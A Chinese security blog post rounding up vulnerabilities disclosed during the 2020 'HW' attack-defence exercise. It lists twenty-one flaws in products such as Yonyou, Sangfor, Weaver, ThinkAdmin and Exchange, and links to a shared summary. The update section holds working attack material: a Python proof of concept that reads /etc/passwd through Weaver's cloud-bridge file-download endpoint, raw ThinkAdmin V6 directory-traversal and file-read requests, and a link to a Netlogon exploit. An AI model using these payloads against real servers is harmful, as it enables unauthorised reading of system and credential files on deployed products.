HW2020 – 0day总结 – 续集

  • A+
所属分类:安全文章

HW2020 - 0day总结 - 续集

hw期间每天漏洞都在更新,目前有以下这些:

1.用友GRP-u8 SQL注入2.天融信TopApp-LB sql注入3.深信服EDR RCE漏洞4.绿盟UTS绕过登录5.WPS命令执行漏洞(无)6.齐治堡垒机 rce7.联软准入漏洞(无)8.泛微云桥任意文件读取9.深信服 SSL VPN 远程代码执行漏洞(暂无)10.Apache DolphinScheduler 远程代码执行漏洞11.Exchange Server 远程代码执行漏洞12.Apache DolphinScheduler 权限覆盖漏洞[CVE-2020-13922]13.Netlogon 特权提升漏洞(CVE-2020-147214.coremail 0day - may be rce(无)15.activemq远程代码执行0day16.天融信数据防泄漏系统越权修改管理员密码17.Wordpress File-manager任意文件上传18.CVE-2020-7293  McAfee Web 多个高危漏洞19.ThinkAdminV6 任意文件操作20.VMware Fusion 权限提升漏洞(CVE-2020-398021.CNVD-2020-27769-拓尔思TRSWAS5.0文件读取漏洞

发上语雀地址,每天更新可以同步更新到分享中。


https://www.yuque.com/docs/share/ad8192ca-39ec-4950-86e9-01dfa989bf6f?#(密码:gf34) 《HW2020 - 0day总结》


2020年9月17日更新内容:

8.泛微云桥任意文件读取

更新新的利用方式,可以目录遍历,然后再读取。

# 检测代码,关键片段def poc(u,**kw):  if kw:    file = kw['file']  else:    file = '/etc/passwd'  print("[*] Checking %s"%(u))  uri = "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://%s&fileExt=txt"%(file)  url = u + uri  try:    res = requests.get(url,verify=False,timeout=timeout)  except Exception as e:    print("[-] Error %s , %s"%(u,e))    return   try:    data = json.loads(res.content)    res = requests.get(u+"/file/fileNoLogin/%s"%(data['id']),verify=False,timeout=timeout)    print("[*] %s is vulnerabile!" %(u))    print(res.text)    log("[*] %s is vulnerabile!" %(u))    log(res.text)  except Exception as e:    print("[-] %s not vulnerabile!"%(u))    #print("[-] %s"%(e))

HW2020 - 0day总结 - 续集


13.Netlogon 特权提升漏洞(CVE-2020-1472)

添加漏洞exp:https://github.com/dirkjanm/CVE-2020-1472

19.ThinkAdminV6 任意文件操作

(消息来源:渗了个透 公众号)


Update.php 三个函数未校验访问权限1、目录遍历注意POST数据包rules参数值需要URL编码

POST /admin.html?s=admin/api.Update/node
rules=%5B%22.%2F%22%5D

HW2020 - 0day总结 - 续集

2、文件读取,后面那一串是UTF8字符串加密后的结果。计算方式在Update.php中的加密函数。

/admin.html?s=admin/api.Update/get/encode/
34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

HW2020 - 0day总结 - 续集

新增预警

20.VMware Fusion 权限提升漏洞(CVE-2020-3980)

21.CNVD-2020-27769-拓尔思TRSWAS5.0文件读取漏洞


来自阿里云规则中心的预警(可能是历史漏洞)

1.phpcms V9远程代码执行

HW2020 - 0day总结 - 续集





另外,众人拾柴火焰高,如果总结中,有还未收录或者需要补充的地方,可给微信公众号发送消息及时补充。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: